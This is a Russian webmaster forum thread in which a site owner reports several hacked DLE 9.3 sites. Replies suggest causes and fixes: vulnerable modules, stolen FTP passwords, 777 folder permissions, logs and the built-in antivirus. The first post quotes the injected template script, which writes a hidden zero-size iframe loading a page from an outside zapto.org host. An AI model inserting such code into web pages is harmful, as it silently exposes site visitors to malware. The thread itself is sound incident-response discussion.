X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

Открыть тему
Тема закрыта
> Взломали несколько сайтов на ДЛЕ
bmp104
bmp104
Topic Starter сообщение 28.12.2011, 17:45; Ответить: bmp104
Сообщение #1


Завсегдатай
*****


Группа: Active User
Сообщений: 682
Регистрация: 13.12.2010
Поблагодарили: 55 раз
Репутация:   10  


Взломали несколько сайтов на ДЛЕ 9.3, в шаблоне main появился код:

<script type="text/javascript">
function writeHTMLasJS(){
document.write("<iframe src=\"http:\/\/75.zapto.org\/bleedeng\/index.php\" width=\"0\" height=\"0\" frameborder=\"0\"> <\/iframe>");
}
</script>

<!--
now place this function call at whatever point
it needs to write the markup on to the page: -->

<script type="text/javascript">
writeHTMLasJS();
</script>


Может кто уже сталкивался с таким же, подскажите как могли ломануть.
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
un1name1d
un1name1d
сообщение 28.12.2011, 17:47; Ответить: un1name1d
Сообщение #2


Синдром вахтёра на пенсии
******


Группа: Active User
Сообщений: 1686
Регистрация: 20.1.2011
Поблагодарили: 1906 раз
Репутация:   172  


http://www.maultalk.com/topic101650s0.html (хотя там WP, а здесь - ДЛЕ, ну да ладно, методы профилактики подходят).

Сообщение отредактировал un1name1d - 28.12.2011, 17:48
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
nick777
nick777
сообщение 29.12.2011, 0:20; Ответить: nick777
Сообщение #3


Завсегдатай
*****

Группа: Active User
Сообщений: 653
Регистрация: 19.9.2010
Из: Россия, город Москва Кто: Веб-мастер/блоггер Блог url: partnerki-runeta.ru
Поблагодарили: 105 раз
Репутация:   11  


un1ymous, +1.

Еще хочу добавить, что на DLE часто модули разные уязвимы - погуглите: "название модуля +уязвимость" - так с каждым модулем. Еще не помешает: "версия dle +уязвимость".


--------------------
На мобильной рекламе можно зарабатывать по-белому здесь!
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
referer
referer
сообщение 29.12.2011, 0:25; Ответить: referer
Сообщение #4


Завсегдатай
*****


Группа: Active User
Сообщений: 702
Регистрация: 20.11.2010
Из: Украина, Николаев
Поблагодарили: 78 раз
Репутация:   25  


дле не ломали у меня хоть и версии древние 8-е на двух сайтах, но за джумлу знаю что постоянно домают)


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
xadminx
xadminx
сообщение 29.12.2011, 0:38; Ответить: xadminx
Сообщение #5


Новичок
*

Группа: Viewer
Сообщений: 11
Регистрация: 6.12.2010
Поблагодарили: 1 раз
Репутация:   0  


могли у вас увести пароли от фтп


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
hostingbloger
hostingbloger
сообщение 29.12.2011, 1:09; Ответить: hostingbloger
Сообщение #6


Новичок
*

Группа: User
Сообщений: 31
Регистрация: 28.12.2011
Поблагодарили: 2 раза
Репутация:   -3  


Какие права стоят на /uploads и на /templates ? 777?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
ZorG
ZorG
сообщение 29.12.2011, 2:12; Ответить: ZorG
Сообщение #7


Частый гость
**

Группа: User
Сообщений: 84
Регистрация: 7.8.2010
Поблагодарили: 7 раз
Репутация:   3  


Что в логах?


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Exebit
Exebit
сообщение 30.12.2011, 10:30; Ответить: Exebit
Сообщение #8


Новичок
*

Группа: Viewer
Сообщений: 4
Регистрация: 26.12.2011
Поблагодарили: 1 раз
Репутация:   0  


Попробуйте запустить антивирус встроенный в DLE 9.3 он покажет все левые файлы, а там уже можно прикинуть как сломали и еще какая версия движка, официальная или зануленная?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
bmp104
bmp104
Topic Starter сообщение 6.2.2012, 13:37; Ответить: bmp104
Сообщение #9


Завсегдатай
*****


Группа: Active User
Сообщений: 682
Регистрация: 13.12.2010
Поблагодарили: 55 раз
Репутация:   10  


Какие права стоят на /uploads и на /templates ? 777?


Да, при установке сказано их ставить.

Замечание модератора:
Эта тема была закрыта автоматически ввиду отсутствия активности в ней на протяжении 100+ дней.
Если Вы считаете ее актуальной и хотите оставить сообщение, то воспользуйтесь кнопкой
или обратитесь к любому из модераторов.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Горячая тема (нет новых ответов) Предлагаю написание текстов и наполнение сайтов
Написание статей/новостей и наполнение сайтов, форумов, ИМ
43 e16r 17598 Сегодня, 19:32
автор: e16r
Открытая тема (нет новых ответов) Дизайн сайтов - красиво и по адекватным ценам
Промо, лендинги...
2 kubaidullaev 627 Сегодня, 18:27
автор: kubaidullaev
Горячая тема (нет новых ответов) Разработка и правка сайтов, не дорого.
Бюджетные цены на правки, редактировения. Помощь по любым вопросам.
44 improvs 14683 Сегодня, 15:16
автор: improvs
Горячая тема (нет новых ответов) Тема имеет прикрепленные файлыКомплексный прогон сайтов, нет каталогов №3 от shtaketo, хороший рост НЧ,СЧ,ВЧ Тиц 10-30 пр 1-3
270 shtaketo 224665 Сегодня, 13:42
автор: shtaketo
Горячая тема (нет новых ответов) Тема имеет прикрепленные файлы11 отличных новостных сайтов с ТИЦ до 475
Подходят разные тематики
63 kater1 11503 Сегодня, 10:19
автор: kater1


 



RSS Текстовая версия Сейчас: 23.5.2018, 23:04
Дизайн